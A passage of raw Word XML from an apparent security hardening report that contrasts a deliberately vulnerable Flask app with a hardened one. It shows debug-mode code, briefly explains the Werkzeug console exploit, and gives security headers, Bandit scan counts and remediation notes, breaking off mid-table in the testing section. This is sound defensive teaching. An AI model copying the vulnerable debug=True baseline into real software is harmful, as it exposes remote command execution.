            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="FEF2F2"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="28" w:space="0" w:color="EF4444"/>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B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>[VULNERABLE BASELINE] vulnerable_app/app.py</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>if __name__ == "__main__":</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    # Flask Debug mode enabled in production - Werkzeug PIN exploit</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    # Session cookies lack HttpOnly, Secure, and SameSite attributes</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    app.run(debug=True, host="0.0.0.0", port=5000)</w:t>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Exploit Mechanism &amp; Real-World Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Running with debug=True enables the interactive Werkzeug browser debugger. An attacker triggering an unhandled exception accesses an interactive Python console directly from the browser to execute system commands. Furthermore, unprotected session cookies can be harvested by malicious JavaScript.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Secure Engineered Remediation</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22C55E"/>
              <w:top w:val="none"/>
              <w:bottom w:val="none"/>
              <w:right w:val="none"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b/>
                <w:color w:val="15803D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>[SECURE REMEDIATION] secure_app/app.py &amp; secure_app/config.py</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEBUG = False  # Enforced debug=False</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>@app.after_request</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>def apply_security_headers(response):</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    response.headers["X-Content-Type-Options"] = "nosniff"</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    response.headers["X-Frame-Options"] = "DENY"</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    response.headers["Content-Security-Policy"] = "default-src 'self'"</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    response.headers["Strict-Transport-Security"] = "max-age=31536000; includeSubDomains"</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    return response</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t># Cookies set with: HttpOnly=True, Secure=True, SameSite='Lax'</w:t>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Defense Rationale &amp; Compliance Alignment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>HTTP security headers enforce defense-in-depth at the browser layer, blocking MIME-sniffing, clickjacking (iframe framing), and unauthorized script execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="34"/>
        </w:rPr>
        <w:t>5. Static Analysis Audit Comparison (Bandit)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Static Application Security Testing (SAST) was performed using Bandit v1.9.4, an automated security scanner that builds and analyzes Abstract Syntax Trees (AST) of Python source code to detect known security anti-patterns.</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2340"/>
        <w:gridCol w:w="2340"/>
        <w:gridCol w:w="2340"/>
        <w:gridCol w:w="2340"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Finding Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Baseline Vulnerable App</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Hardened Secure App</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Remediation Rate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>High Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3 Detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0 Detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>100% Resolved</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Medium Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>8 Detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0 Detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>100% Resolved</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3 Detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0 Detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>100% Resolved</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F0FDF4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="15803D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Total Vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F0FDF4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="15803D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>14 Issues</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F0FDF4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="15803D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0 Issues (Clean)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="F0FDF4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="15803D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>100% Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Breakdown of Baseline SAST Findings Resolved</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">B608: Hardcoded SQL Expressions: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Resolved by replacing raw string queries with parameterized statements across all database access functions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">B301: Pickle Unsafe Deserialization: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Resolved by replacing pickle object unmarshaling with HMAC-SHA256 signed JSON serialization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">B602: Subprocess Popen with shell=True: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Resolved by eliminating OS subprocesses in favor of native Python socket connection checks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">B324: Use of Insecure MD5 Hash: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Resolved by upgrading to PBKDF2-HMAC-SHA256 with 600,000 iterations and 256-bit cryptographic salts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">B201: Flask Debug Mode Active: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Resolved by enforcing debug=False across all application configurations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="34"/>
        </w:rPr>
        <w:t>6. Testing &amp; Dynamic Exploit Verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A multi-tier automated test suite was constructed using Pytest v9.1.1. The suite contains 36 comprehensive tests validating cryptographic primitives, functional workflows, and real-world exploit simulation payloads.</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2340"/>
        <w:gridCol w:w="2340"/>
        <w:gridCol w:w="2340"/>
        <w:gridCol w:w="2340"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Test Suite Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
